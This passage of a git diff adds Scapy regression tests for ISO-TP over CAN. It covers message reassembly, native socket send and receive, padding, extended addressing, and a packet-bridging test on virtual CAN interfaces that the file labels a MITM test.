did=0x641) - -bridgeStarted = threading.Event() -def bridge(): - global bridgeStarted - global bSucc - def forwarding(pkt): - pkt.data = 'changed' - return pkt - bridge_and_sniff(if1=bSocket0, if2=bSocket1, xfrm12=forwarding, xfrm21=forwarding, timeout=0.5, started_callback=bridgeStarted.set) - bSocket0.close() - bSocket1.close() - bSucc = True - -def RequestBothVCans(): - global rSucc - packetVcan0 = ISOTP(b'RequestVcan0') - packetVcan1 = ISOTP(b'RequestVcan1') - isoTpSocket0.send(packetVcan0) - isoTpSocket1.send(packetVcan1) - rSucc = True - -threadBridge = threading.Thread(target=bridge) -threadBridge.start() -threadSender = threading.Thread(target=RequestBothVCans) -bridgeStarted.wait(timeout=5) - -packetsVCan0 = isoTpSocket0.sniff(timeout=0.5, started_callback=threadSender.start) -packetsVCan1 = isoTpSocket1.sniff(timeout=0.5) - -packetsVCan0[0].data = b'changed' -assert len(packetsVCan0) == 1 -packetsVCan1[0].data = b'changed' -assert len(packetsVCan1) == 1 - -isoTpSocket0.close() -isoTpSocket1.close() - -threadSender.join(timeout=5) -threadBridge.join(timeout=5) - -assert(bSucc) -assert(rSucc) - -+ Cleanup - -= Cleanup reference to ISOTPSoftSocket to let the thread end -s = None - -= Delete vcan interfaces - -assert cleanup_interfaces() diff --git a/test/contrib/isotp_message_builder.uts b/test/contrib/isotp_message_builder.uts new file mode 100644 index 00000000000..6f255677add --- /dev/null +++ b/test/contrib/isotp_message_builder.uts @@ -0,0 +1,263 @@ +% Regression tests for ISOTP Message Builder + ++ Configuration +~ conf + += Definition of utility functions + +# hexadecimal to bytes convenience function +if six.PY2: + dhex = lambda s: "".join(s.split()).decode('hex') +else: + dhex = bytes.fromhex + += Import isotp + +conf.contribs['ISOTP'] = {'use-can-isotp-kernel-module': False} + +load_layer("can", globals_dict=globals()) +load_contrib("isotp", globals_dict=globals()) + + ++ Testing ISOTPMessageBuilder + += Create ISOTPMessageBuilder +m = ISOTPMessageBuilder() + += Feed packets to machine +ff = CAN(identifier=0x241, data=dhex("10 28 01 02 03 04 05 06")) +ff.time = 1000 +m.feed(ff) +m.feed(CAN(identifier=0x641, data=dhex("30 03 00" ))) +m.feed(CAN(identifier=0x241, data=dhex("21 07 08 09 0A 0B 0C 0D"))) +m.feed(CAN(identifier=0x241, data=dhex("22 0E 0F 10 11 12 13 14"))) +m.feed(CAN(identifier=0x241, data=dhex("23 15 16 17 18 19 1A 1B"))) +m.feed(CAN(identifier=0x641, data=dhex("30 03 00" ))) +m.feed(CAN(identifier=0x241, data=dhex("24 1C 1D 1E 1F 20 21 22"))) +m.feed(CAN(identifier=0x241, data=dhex("25 23 24 25 26 27 28" ))) + += Verify there is a ready message in the machine +assert(m.count == 1) + += Extract the message from the machine +msg = m.pop() +assert(m.count == 0) +assert(msg.dst == 0x241) +assert(msg.exdst is None) +assert(msg.src == 0x641) +assert(msg.exsrc is None) +assert(msg.time == 1000) +expected = dhex("01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25 26 27 28") +assert(msg.data == expected) + += Verify that no error happens when there is not enough data +m = ISOTPMessageBuilder() +m.feed(CAN(identifier=0x241, data=dhex("04 AB CD EF"))) +msg = m.pop() +assert(msg is None) + += Verify that no error happens when there is no data +m = ISOTPMessageBuilder() +m.feed(CAN(identifier=0x241, data=dhex(""))) +msg = m.pop() +assert(msg is None) + += Verify a single frame without EA +m = ISOTPMessageBuilder() +m.feed(CAN(identifier=0x241, data=dhex("04 AB CD EF 04"))) +msg = m.pop() +assert(msg.dst == 0x241) +assert(msg.exdst is None) +assert(msg.data == dhex("AB CD EF 04")) + += Single frame without EA, with excessive bytes in CAN frame +m = ISOTPMessageBuilder() +m.feed(CAN(identifier=0x241, data=dhex("03 AB CD EF AB CD EF AB"))) +msg = m.pop() +assert(msg.dst == 0x241) +assert(msg.exdst is None) +assert(msg.data == dhex("AB CD EF")) + += Verify a single frame with EA +m = ISOTPMessageBuilder() +m.feed(CAN(identifier=0x241, data=dhex("E2 04 01 02 03 04"))) +msg = m.pop() +assert(msg.dst == 0x241) +assert(msg.exdst is 0xE2) +assert(msg.data == dhex("01 02 03 04")) + += Single CAN frame that has 2 valid interpretations +m = ISOTPMessageBuilder() +m.feed(CAN(identifier=0x241, data=dhex("04 01 02 03 04"))) +msg = m.pop(0x241, None) +assert(msg.dst == 0x241) +assert(msg.exdst is None) +assert(msg.data == dhex("01 02 03 04")) +msg = m.pop() +assert(msg.dst == 0x241) +assert(msg.exdst == 0x04) +assert(msg.data == dhex("02")) + += Verify multiple frames with EA +m = ISOTPMessageBuilder() +ff = CAN(identifier=0x241, data=dhex("EA 10 28 01 02 03 04 05")) +ff.time = 1005 +m.feed(ff) +m.feed(CAN(identifier=0x641, data=dhex("EA 30 03 00" ))) +m.feed(CAN(identifier=0x241, data=dhex("EA 21 06 07 08 09 0A 0B"))) +m.feed(CAN(identifier=0x241, data=dhex("EA 22 0C 0D 0E 0F 10 11"))) +m.feed(CAN(identifier=0x241, data=dhex("EA 23 12 13 14 15 16 17"))) +m.feed(CAN(identifier=0x641, data=dhex("EA 30 03 00" ))) +m.feed(CAN(identifier=0x241, data=dhex("EA 24 18 19 1A 1B 1C 1D"))) +m.feed(CAN(identifier=0x241, data=dhex("EA 25 1E 1F 20 21 22 23"))) +m.feed(CAN(identifier=0x241, data=dhex("EA 26 24 25 26 27 28" ))) +msg = m.pop() +assert(msg.dst == 0x241) +assert(msg.exdst is 0xEA) +assert(msg.src == 0x641) +assert(msg.exsrc is 0xEA) +assert(msg.time == 1005) +assert(msg.data == dhex("01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25 26 27 28")) + += Verify multiple frames with EA 2 +m = ISOTPMessageBuilder() +m.feed(CAN(identifier=0x241, data=dhex("EA 10 28 01 02 03 04 05"))) +m.feed(CAN(identifier=0x641, data=dhex("AE 30 03 00" ))) +m.feed(CAN(identifier=0x241, data=dhex("EA 21 06 07 08 09 0A 0B"))) +m.feed(CAN(identifier=0x241, data=dhex("EA 22 0C 0D 0E 0F 10 11"))) +m.feed(CAN(identifier=0x241, data=dhex("EA 23 12 13 14 15 16 17"))) +m.feed(CAN(identifier=0x641, data=dhex("AE 30 03 00" ))) +m.feed(CAN(identifier=0x241, data=dhex("EA 24 18 19 1A 1B 1C 1D"))) +m.feed(CAN(identifier=0x241, data=dhex("EA 25 1E 1F 20 21 22 23"))) +m.feed(CAN(identifier=0x241, data=dhex("EA 26 24 25 26 27 28" ))) +msg = m.pop() +assert(msg.dst == 0x241) +assert(msg.exdst is 0xEA) +assert(msg.src == 0x641) +assert(msg.exsrc is 0xAE) +assert(msg.data == dhex("01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25 26 27 28")) + += Verify that an EA starting with 1 will still work +m = ISOTPMessageBuilder() +m.feed(CAN(identifier=0x241, data=dhex("1A 10 14 01 02 03 04 05"))) +m.feed(CAN(identifier=0x641, data=dhex("1A 30 03 00" ))) +m.feed(CAN(identifier=0x241, data=dhex("1A 21 06 07 08 09 0A 0B"))) +m.feed(CAN(identifier=0x241, data=dhex("1A 22 0C 0D 0E 0F 10 11"))) +m.feed(CAN(identifier=0x241, data=dhex("1A 23 12 13 14 15 16 17"))) +msg = m.pop() +assert(msg.dst == 0x241) +assert(msg.exdst is 0x1A) +assert(msg.src == 0x641) +assert(msg.exsrc is 0x1A) +assert(msg.data == dhex("01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14")) + += Verify that an EA of 07 will still work +m = ISOTPMessageBuilder() +m.feed(CAN(identifier=0x241, data=dhex("07 10 0A 01 02 03 04 05"))) +m.feed(CAN(identifier=0x641, data=dhex("07 30 03 00" ))) +m.feed(CAN(identifier=0x241, data=dhex("07 21 06 07 08 09 0A 0B"))) +msg = m.pop(0x241, 0x07) +assert(msg.dst == 0x241) +assert(msg.exdst is 0x07) +assert(msg.src == 0x641) +assert(msg.exsrc is 0x07) +assert(msg.data == dhex("01 02 03 04 05 06 07 08 09 0A")) + += Verify that three interleaved messages can be sniffed simultaneously on the same identifier and extended address (very unrealistic) +m = ISOTPMessageBuilder() +ff = CAN(identifier=0x241, data=dhex("EA 10 28 01 02 03 04 05")) +ff.time = 300 +m.feed(ff) # start of message A +m.feed(CAN(identifier=0x641, data=dhex("EA 30 03 00" ))) +m.feed(CAN(identifier=0x241, data=dhex("EA 21 06 07 08 09 0A 0B"))) +m.feed(CAN(identifier=0x241, data=dhex("EA 22 0C 0D 0E 0F 10 11"))) +m.feed(CAN(identifier=0x241, data=dhex("EA 23 12 13 14 15 16 17"))) +ff = CAN(identifier=0x241, data=dhex("EA 10 10 31 32 33 34 35")) +ff.time = 400 +m.feed(ff) # start of message B +m.feed(CAN(identifier=0x641, data=dhex("EA 30 03 00" ))) +sf = CAN(identifier=0x241, data=dhex("EA 03 A6 A7 A8" )) +sf.time = 200 +m.feed(sf) # single-frame message C +m.feed(CAN(identifier=0x641, data=dhex("EA 30 03 00" ))) +m.feed(CAN(identifier=0x241, data=dhex("EA 24 18 19 1A 1B 1C 1D"))) +m.feed(CAN(identifier=0x241, data=dhex("EA 21 36 37 38 39 3A 3B"))) +m.feed(CAN(identifier=0x241, data=dhex("EA 22 3C 3D 3E 3F 40" ))) # end of message B +m.feed(CAN(identifier=0x241, data=dhex("EA 25 1E 1F 20 21 22 23"))) +m.feed(CAN(identifier=0x241, data=dhex("EA 26 24 25 26 27 28" ))) # end of message A +msg = m.pop() +assert(msg.dst == 0x241) +assert(msg.exdst is 0xEA) +assert(msg.data == dhex("A6 A7 A8")) +assert(msg.time == 200) +msg = m.pop() +assert(msg.dst == 0x241) +assert(msg.exdst is 0xEA) +assert(msg.src == 0x641) +assert(msg.exsrc is 0xEA) +assert(msg.time == 400) +assert(msg.data == dhex("31 32 33 34 35 36 37 38 39 3A 3B 3C 3D 3E 3F 40")) +msg = m.pop() +assert(msg.dst == 0x241) +assert(msg.exdst is 0xEA) +assert(msg.src == 0x641) +assert(msg.exsrc is 0xEA) +assert(msg.time == 300) +assert(msg.data == dhex("01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25 26 27 28")) + + += Verify multiple frames with EA from list +m = ISOTPMessageBuilder() +msgs = [ + CAN(identifier=0x241, data=dhex("EA 10 28 01 02 03 04 05")), + CAN(identifier=0x641, data=dhex("EA 30 03 00" )), + CAN(identifier=0x241, data=dhex("EA 21 06 07 08 09 0A 0B")), + CAN(identifier=0x241, data=dhex("EA 22 0C 0D 0E 0F 10 11")), + CAN(identifier=0x241, data=dhex("EA 23 12 13 14 15 16 17")), + CAN(identifier=0x641, data=dhex("EA 30 03 00" )), + CAN(identifier=0x241, data=dhex("EA 24 18 19 1A 1B 1C 1D")), + CAN(identifier=0x241, data=dhex("EA 25 1E 1F 20 21 22 23")), + CAN(identifier=0x241, data=dhex("EA 26 24 25 26 27 28" ))] +m.feed(msgs) +msg = m.pop() +assert(msg.dst == 0x241) +assert(msg.exdst is 0xEA) +assert(msg.src == 0x641) +assert(msg.exsrc is 0xEA) +assert(msg.data == dhex("01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25 26 27 28")) + += Verify multiple frames with EA from list and iterator +m = ISOTPMessageBuilder() +msgs = [ + CAN(identifier=0x241, data=dhex("EA 10 28 01 02 03 04 05")), + CAN(identifier=0x641, data=dhex("EA 30 03 00" )), + CAN(identifier=0x241, data=dhex("EA 21 06 07 08 09 0A 0B")), + CAN(identifier=0x241, data=dhex("EA 22 0C 0D 0E 0F 10 11")), + CAN(identifier=0x241, data=dhex("EA 23 12 13 14 15 16 17")), + CAN(identifier=0x641, data=dhex("EA 30 03 00" )), + CAN(identifier=0x241, data=dhex("EA 24 18 19 1A 1B 1C 1D")), + CAN(identifier=0x241, data=dhex("EA 25 1E 1F 20 21 22 23")), + CAN(identifier=0x241, data=dhex("EA 26 24 25 26 27 28" )), + CAN(identifier=0x241, data=dhex("EA 03 A6 A7 A8" )), + CAN(identifier=0x241, data=dhex("EA 03 A6 A7 A8"))] +m.feed(msgs) +assert m.count == 3 +assert len(m) == 3 + +isotpmsgs = [x for x in m] +assert len(isotpmsgs) == 3 +msg = isotpmsgs[0] +assert(msg.dst == 0x241) +assert(msg.exdst is 0xEA) +assert(msg.src == 0x641) +assert(msg.exsrc is 0xEA) +assert(msg.data == dhex("01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25 26 27 28")) + +assert isotpmsgs[1] == isotpmsgs[2] + += Verify a single frame without EA and different basecls +m = ISOTPMessageBuilder(basecls=Raw) +m.feed(CAN(identifier=0x241, data=dhex("04 AB CD EF 04"))) +msg = m.pop() +assert(msg.load == dhex("AB CD EF 04")) +assert(type(msg) == Raw) \ No newline at end of file diff --git a/test/contrib/isotp_native_socket.uts b/test/contrib/isotp_native_socket.uts new file mode 100644 index 00000000000..41a0e587d16 --- /dev/null +++ b/test/contrib/isotp_native_socket.uts @@ -0,0 +1,628 @@ +% Regression tests for ISOTPNativeSocket +~ automotive_comm + ++ Configuration +~ conf + += Imports + +with open(scapy_path("test/contrib/automotive/interface_mockup.py")) as f: + exec(f.read()) + += Definition of constants, utility functions and mock classes + +# hexadecimal to bytes convenience function +if six.PY2: + dhex = lambda s: "".join(s.split()).decode('hex') +else: + dhex = bytes.fromhex + ++ Compatibility with can-isotp linux kernel modules + += Compatibility with isotpsend +exit_if_no_isotp_module() + +message = "01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14" + +with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x642, did=0x242) as s: + p = subprocess.Popen(["isotpsend", "-s", "242", "-d", "642", iface0], stdin=subprocess.PIPE, universal_newlines=True) + p.communicate(message) + r = p.returncode + assert(r == 0) + isotp = s.recv() + assert(isotp.data == dhex(message)) + + += Compatibility with isotpsend - extended addresses +exit_if_no_isotp_module() +message = "01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14" + +with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x644, did=0x244, extended_addr=0xaa, extended_rx_addr=0xee) as s: + p = subprocess.Popen(["isotpsend", "-s", "244", "-d", "644", "-x", "ee:aa", iface0], stdin=subprocess.PIPE, universal_newlines=True) + p.communicate(message) + r = p.returncode + assert(r == 0) + isotp = s.recv() + assert(isotp.data == dhex(message)) + + += Compatibility with isotprecv +exit_if_no_isotp_module() + +isotp = ISOTP(data=bytearray(range(1,20))) +p = subprocess.Popen(["isotprecv", "-s", "243", "-d", "643", "-b", "3", iface0], stdout=subprocess.PIPE) +time.sleep(0.1) +with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x643, did=0x243) as s: + s.send(isotp) + +timer = threading.Timer(1, lambda: p.terminate() if p.poll() else p.wait()) +timer.start() # Timeout the receiver after 1 second +r = p.wait() +assert(0 == r) + +result = None +for i in range(10): + time.sleep(0.1) + if p.poll() is not None: + result = p.stdout.readline().decode().strip() + break + +assert(result is not None) +result_data = dhex(result) +assert(result_data == isotp.data) + +timer.join(5) +assert not timer.is_alive() + + += Compatibility with isotprecv - extended addresses +exit_if_no_isotp_module() +isotp = ISOTP(data=bytearray(range(1,20))) +cmd = ["isotprecv", "-s245", "-d645", "-b3", "-x", "ee:aa", iface0] +p = subprocess.Popen(cmd, stdout=subprocess.PIPE) +time.sleep(0.1) # Give some time for starting reception +with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x645, did=0x245, extended_addr=0xaa, extended_rx_addr=0xee) as s: + s.send(isotp) + +timer = threading.Timer(1, lambda: p.terminate() if p.poll() else p.wait()) +timer.start() # Timeout the receiver after 1 second +r = p.wait() +assert(0 == r) + +result = None +for i in range(10): + time.sleep(0.1) + if p.poll() is not None: + result = p.stdout.readline().decode().strip() + break + +assert(result is not None) +result_data = dhex(result) +assert(result_data == isotp.data) + +timer.join(5) +assert not timer.is_alive() + + ++ ISOTPNativeSocket tests + += Create ISOTP socket +exit_if_no_isotp_module() +s = ISOTPNativeSocket(iface0, sid=0x641, did=0x241) + += Send single frame ISOTP message +exit_if_no_isotp_module() + +with new_can_socket(iface0) as cans: + s = ISOTPNativeSocket(iface0, sid=0x641, did=0x241) + s.send(ISOTP(data=dhex("01 02 03 04 05"))) + can = cans.sniff(timeout=1, count=1)[0] + assert(can.identifier == 0x641) + assert(can.data == dhex("05 01 02 03 04 05")) + + += Send single frame ISOTP message Test init with CANSocket +exit_if_no_isotp_module() +cans = CANSocket(iface0) +s = ISOTPNativeSocket(cans, sid=0x641, did=0x241) +s.send(ISOTP(data=dhex("01 02 03 04 05"))) +can = cans.sniff(timeout=1, count=1)[0] +assert(can.identifier == 0x641) +assert(can.data == dhex("05 01 02 03 04 05")) +cans.close() + + += Test init with wrong type +exit_if_no_isotp_module() +exception_catched = False +try: + s = ISOTPNativeSocket(42, sid=0x641, did=0x241) +except Scapy_Exception: + exception_catched = True + +assert exception_catched + += Send two-frame ISOTP message +exit_if_no_isotp_module() + +evt = threading.Event() +def acker(): + with new_can_socket(iface0) as cans: + evt.set() + can = cans.sniff(timeout=1, count=1)[0] + cans.send(CAN(identifier = 0x241, data=dhex("30 00 00"))) + + +with new_can_socket(iface0) as cans: + t = Thread(target=acker) + t.start() + s = ISOTPNativeSocket(iface0, sid=0x641, did=0x241) + evt.wait(timeout=5) + s.send(ISOTP(data=dhex("01 02 03 04 05 06 07 08"))) + can = cans.sniff(timeout=1, count=1)[0] + assert(can.identifier == 0x641) + assert(can.data == dhex("10 08 01 02 03 04 05 06")) + can = cans.sniff(timeout=1, count=1)[0] + assert(can.identifier == 0x241) + assert(can.data == dhex("30 00 00")) + can = cans.sniff(timeout=1, count=1)[0] + assert(can.identifier == 0x641) + assert(can.data == dhex("21 07 08")) + t.join(timeout=5) + assert not t.is_alive() + += Send a single frame ISOTP message with padding +exit_if_no_isotp_module() +s = ISOTPNativeSocket(iface0, sid=0x641, did=0x241, padding=True) + +with new_can_socket(iface0) as cans: + s.send(ISOTP(data=dhex("01"))) + can = cans.sniff(timeout=1, count=1)[0] + assert(can.length == 8) + + += Send a two-frame ISOTP message with padding +exit_if_no_isotp_module() + +acker_ready = threading.Event() +def acker(): + with new_can_socket(iface0) as acks: + acker_ready.set() + can = acks.sniff(timeout=1, count=1)[0] + acks.send(CAN(identifier = 0x241, data=dhex("30 00 00"))) + +with new_can_socket(iface0) as cans: + thread = Thread(target=acker) + thread.start() + acker_ready.wait(timeout=5) + s = ISOTPNativeSocket(iface0, sid=0x641, did=0x241, padding=True) + s.send(ISOTP(data=dhex("01 02 03 04 05 06 07 08"))) + can = cans.sniff(timeout=1, count=1)[0] + assert(can.identifier == 0x641) + assert(can.data == dhex("10 08 01 02 03 04 05 06")) + can = cans.sniff(timeout=1, count=1)[0] + assert(can.identifier == 0x241) + assert(can.data == dhex("30 00 00")) + can = cans.sniff(timeout=1, count=1)[0] + assert(can.identifier == 0x641) + assert(can.data == dhex("21 07 08 CC CC CC CC CC")) + thread.join(5) + assert not thread.is_alive() + + += Receive a padded single frame ISOTP message with padding disabled +exit_if_no_isotp_module() +s = ISOTPNativeSocket(iface0, sid=0x641, did=0x241, padding=False) +with new_can_socket(iface0) as cans: + cans.send(CAN(identifier=0x241, data=dhex("02 05 06 00 00 00 00 00"))) + res = s.recv() + assert(res.data == dhex("05 06")) + + += Receive a padded single frame ISOTP message with padding enabled +exit_if_no_isotp_module() +s = ISOTPNativeSocket(iface0, sid=0x641, did=0x241, padding=True) +with new_can_socket(iface0) as cans: + cans.send(CAN(identifier=0x241, data=dhex("02 05 06 00 00 00 00 00"))) + res = s.recv() + assert(res.data == dhex("05 06")) + + += Receive a non-padded single frame ISOTP message with padding enabled +exit_if_no_isotp_module() +s = ISOTPNativeSocket(iface0, sid=0x641, did=0x241, padding=True) +with new_can_socket(iface0) as cans: + cans.send(CAN(identifier=0x241, data=dhex("02 05 06"))) + res = s.recv() + assert(res.data == dhex("05 06")) + + += Receive a padded two-frame ISOTP message with padding enabled +exit_if_no_isotp_module() +s = ISOTPNativeSocket(iface0, sid=0x641, did=0x241, padding=True) +with new_can_socket(iface0) as cans: + cans.send(CAN(identifier=0x241, data=dhex("10 09 01 02 03 04 05 06"))) + cans.send(CAN(identifier=0x241, data=dhex("21 07 08 09 00 00 00 00"))) + res = s.recv() + assert(res.data == dhex("01 02 03 04 05 06 07 08 09")) + + += Receive a padded two-frame ISOTP message with padding disabled +exit_if_no_isotp_module() +s = ISOTPNativeSocket(iface0, sid=0x641, did=0x241, padding=False) +with new_can_socket(iface0) as cans: + cans.send(CAN(identifier=0x241, data=dhex("10 09 01 02 03 04 05 06"))) + cans.send(CAN(identifier=0x241, data=dhex("21 07 08 09 00 00 00 00"))) + res = s.recv() + assert(res.data == dhex("01 02 03 04 05 06 07 08 09")) + + += Receive a single frame ISOTP message +exit_if_no_isotp_module() +s = ISOTPNativeSocket(iface0, sid=0x641, did=0x241) +with new_can_socket(iface0) as cans: + cans.send(CAN(identifier = 0x241, data = dhex("05 01 02 03 04 05"))) + isotp = s.recv() + assert(isotp.data == dhex("01 02 03 04 05")) + assert(isotp.src == 0x641) + assert(isotp.dst == 0x241) + assert(isotp.exsrc == None) + assert(isotp.exdst == None) + + += Receive a single frame ISOTP message, with extended addressing +exit_if_no_isotp_module() +s = ISOTPNativeSocket(iface0, sid=0x641, did=0x241, extended_addr=0xc0, extended_rx_addr=0xea) +with new_can_socket(iface0) as cans: + cans.send(CAN(identifier = 0x241, data = dhex("EA 05 01 02 03 04 05"))) + isotp = s.recv() + assert(isotp.data == dhex("01 02 03 04 05")) + assert(isotp.src == 0x641) + assert(isotp.dst == 0x241) + assert(isotp.exsrc == 0xc0) + assert(isotp.exdst == 0xea) + + += Receive a two-frame ISOTP message +exit_if_no_isotp_module() +s = ISOTPNativeSocket(iface0, sid=0x641, did=0x241) +with new_can_socket(iface0) as cans: + cans.send(CAN(identifier = 0x241, data = dhex("10 0B 01 02 03 04 05 06"))) + cans.send(CAN(identifier = 0x241, data = dhex("21 07 08 09 10 11"))) + isotp = s.recv() + assert(isotp.data == dhex("01 02 03 04 05 06 07 08 09 10 11")) + += Receive a two-frame ISOTP message and test python with statement +exit_if_no_isotp_module() +with ISOTPNativeSocket(iface0, sid=0x641, did=0x241) as s: + with new_can_socket(iface0) as cans: + cans.send(CAN(identifier = 0x241, data = dhex("10 0B 01 02 03 04 05 06"))) + cans.send(CAN(identifier = 0x241, data = dhex("21 07 08 09 10 11"))) + isotp = s.recv() + assert(isotp.data == dhex("01 02 03 04 05 06 07 08 09 10 11")) + + += ISOTP Socket sr1 test +exit_if_no_isotp_module() + +txSock = ISOTPNativeSocket(iface0, sid=0x123, did=0x321, basecls=ISOTP) +txmsg = ISOTP(b'\x11\x22\x33') +rx2 = None + +receiver_up = Event() + +def sender(): + global receiver_up + receiver_up.wait(timeout=5) + global txmsg + global rx2 + rx2 = txSock.sr1(txmsg, timeout=1, verbose=True) + +def receiver(): + global receiver_up + with new_can_socket(iface0) as cans: + rx = cans.sniff(timeout=1, count=1, started_callback=receiver_up.set)[0] + cans.send(CAN(identifier=0x321, length=4, data=b'\x03\x7f\x22\x33')) + expectedrx = CAN(identifier=0x123, length=4, data=b'\x03\x11\x22\x33') + assert(rx.length == expectedrx.length) + assert(rx.data == expectedrx.data) + assert(rx.identifier == expectedrx.identifier) + +txThread = threading.Thread(target=sender) +txThread.start() +receiver() +txThread.join(timeout=5) +assert not txThread.is_alive() + +assert(rx2 is not None) +assert(rx2 == ISOTP(b'\x7f\x22\x33')) +assert(rx2.answers(txmsg)) + += ISOTP Socket sr1 and ISOTP test +exit_if_no_isotp_module() +txSock = ISOTPNativeSocket(iface0, 0x123, 0x321, basecls=ISOTP) +rxSock = ISOTPNativeSocket(iface0, 0x321, 0x123, basecls=ISOTP) +msg = ISOTP(b'\x11\x22\x33\x11\x22\x33\x11\x22\x33\x11\x22\x33') +rx2 = None + +receiver_up = Event() + +def sender(): + receiver_up.wait(timeout=5) + global rx2 + rx2 = txSock.sr1(msg, timeout=1, verbose=True) + +def receiver(): + global rx + receiver_up.set() + rx = rxSock.recv() + rxSock.send(msg) + +txThread = threading.Thread(target=sender) +txThread.start() +receiver() +txThread.join(timeout=5) +assert not txThread.is_alive() + +assert(rx == msg) +assert(rxSock.send(msg)) +assert(rx2 is not None) +assert(rx2 == msg) + += ISOTP Socket sr1 and ISOTP test vice versa +exit_if_no_isotp_module() + +rxSock = ISOTPNativeSocket(iface0, 0x321, 0x123, basecls=ISOTP) +txSock = ISOTPNativeSocket(iface0, 0x123, 0x321, basecls=ISOTP) + +msg = ISOTP(b'\x11\x22\x33\x11\x22\x33\x11\x22\x33\x11\x22\x33') + +receiver_up = Event() + +def receiver(): + global rx2, sent + rx2 = rxSock.sniff(count=1, timeout=1, started_callback=receiver_up.set) + sent = rxSock.send(msg) + +def sender(): + global rx + receiver_up.wait(timeout=5) + rx = txSock.sr1(msg, timeout=1,verbose=True) + +rx2 = None +sent = False +rxThread = threading.Thread(target=receiver) +rxThread.start() +sender() +rxThread.join(timeout=5) +assert not rxThread.is_alive() + +assert(rx == msg) +assert(rx2[0] == msg) +assert(sent) + += ISOTP Socket sniff +exit_if_no_isotp_module() + +rxSock = ISOTPNativeSocket(iface0, 0x321, 0x123, basecls=ISOTP) +txSock = ISOTPNativeSocket(iface0, 0x123, 0x321, basecls=ISOTP) +succ = False + +receiver_up = Event() + +def receiver(): + rx = rxSock.sniff(count=5, timeout=1, started_callback=receiver_up.set) + msg = ISOTP(b'\x11\x22\x33\x11\x22\x33\x11\x22\x33\x11\x22\x33') + msg.data += b'0' + assert(rx[0] == msg) + msg.data += b'1' + assert(rx[1] == msg) + msg.data += b'2' + assert(rx[2] == msg) + msg.data += b'3' + assert(rx[3] == msg) + msg.data += b'4' + assert(rx[4] == msg) + global succ + succ = True + +def sender(): + receiver_up.wait(timeout=5) + msg = ISOTP(b'\x11\x22\x33\x11\x22\x33\x11\x22\x33\x11\x22\x33') + msg.data += b'0' + assert(txSock.send(msg)) + msg.data += b'1' + assert(txSock.send(msg)) + msg.data += b'2' + assert(txSock.send(msg)) + msg.data += b'3' + assert(txSock.send(msg)) + msg.data += b'4' + assert(txSock.send(msg)) + +rxThread = threading.Thread(target=receiver) +rxThread.start() +sender() +rxThread.join(timeout=5) +assert not rxThread.is_alive() + +assert(succ) + ++ ISOTPNativeSocket MITM attack tests +~ python3_only vcan_socket needs_root linux + += bridge and sniff with isotp native sockets set up vcan0 and vcan1 for package forwarding vcan1 +exit_if_no_isotp_module() + +isoTpSocket0 = ISOTPNativeSocket(iface0, sid=0x241, did=0x641) +isoTpSocket1 = ISOTPNativeSocket(iface1, sid=0x641, did=0x241) +bSocket0 = ISOTPNativeSocket(iface0, sid=0x641, did=0x241) +bSocket1 = ISOTPNativeSocket(iface1, sid=0x241, did=0x641) + +bridgeStarted = threading.Event() +def bridge(): + global bridgeStarted + def forwarding(pkt): + return pkt + bridge_and_sniff(if1=bSocket0, if2=bSocket1, xfrm12=forwarding, xfrm21=forwarding, timeout=2, count=1, started_callback=bridgeStarted.set) + bSocket0.close() + bSocket1.close() + global bSucc + bSucc = True + +bSucc = False + +threadBridge = threading.Thread(target=bridge) +threadBridge.start() +bridgeStarted.wait(timeout=5) +isoTpSocket0.send(ISOTP(b'Request')) +packetsVCan1 = isoTpSocket1.sniff(timeout=0.5, count=1) + +assert len(packetsVCan1) == 1 + +isoTpSocket0.close() +isoTpSocket1.close() + +threadBridge.join(timeout=5) +assert not threadBridge.is_alive() + +assert(bSucc) + += bridge and sniff with isotp native sockets set up vcan0 and vcan1 for package change to vcan1 +exit_if_no_isotp_module() + +isoTpSocket0 = ISOTPNativeSocket(iface0, sid=0x241, did=0x641) +isoTpSocket1 = ISOTPNativeSocket(iface1, sid=0x641, did=0x241) +bSocket0 = ISOTPNativeSocket(iface0, sid=0x641, did=0x241) +bSocket1 = ISOTPNativeSocket(iface1, sid=0x241, did=0x641) + +bSucc = False + +bridgeStarted = threading.Event() +def bridge(): + global bridgeStarted + global bSucc + def forwarding(pkt): + pkt.data = 'changed' + return pkt + bridge_and_sniff(if1=bSocket0, if2=bSocket1, xfrm12=forwarding, xfrm21=forwarding, timeout=0.5, started_callback=bridgeStarted.set) + bSocket0.close() + bSocket1.close() + bSucc = True + +threadBridge = threading.Thread(target=bridge) +threadBridge.start() +bridgeStarted.wait(timeout=5) +isoTpSocket0.send(ISOTP(b'Request')) +packetsVCan1 = isoTpSocket1.sniff(timeout=0.5, count=1) + +packetsVCan1[0].data = b'changed' +assert len(packetsVCan1) == 1 + +isoTpSocket0.close() +isoTpSocket1.close() + +threadBridge.join(timeout=5) +assert not threadBridge.is_alive() + +assert(bSucc) + += bridge and sniff with isotp native sockets set up vcan0 and vcan1 for package forwarding in both directions +exit_if_no_isotp_module() + +bSucc = False + +isoTpSocket0 = ISOTPNativeSocket(iface0, sid=0x241, did=0x641) +isoTpSocket1 = ISOTPNativeSocket(iface1, sid=0x641, did=0x241) +bSocket0 = ISOTPNativeSocket(iface0, 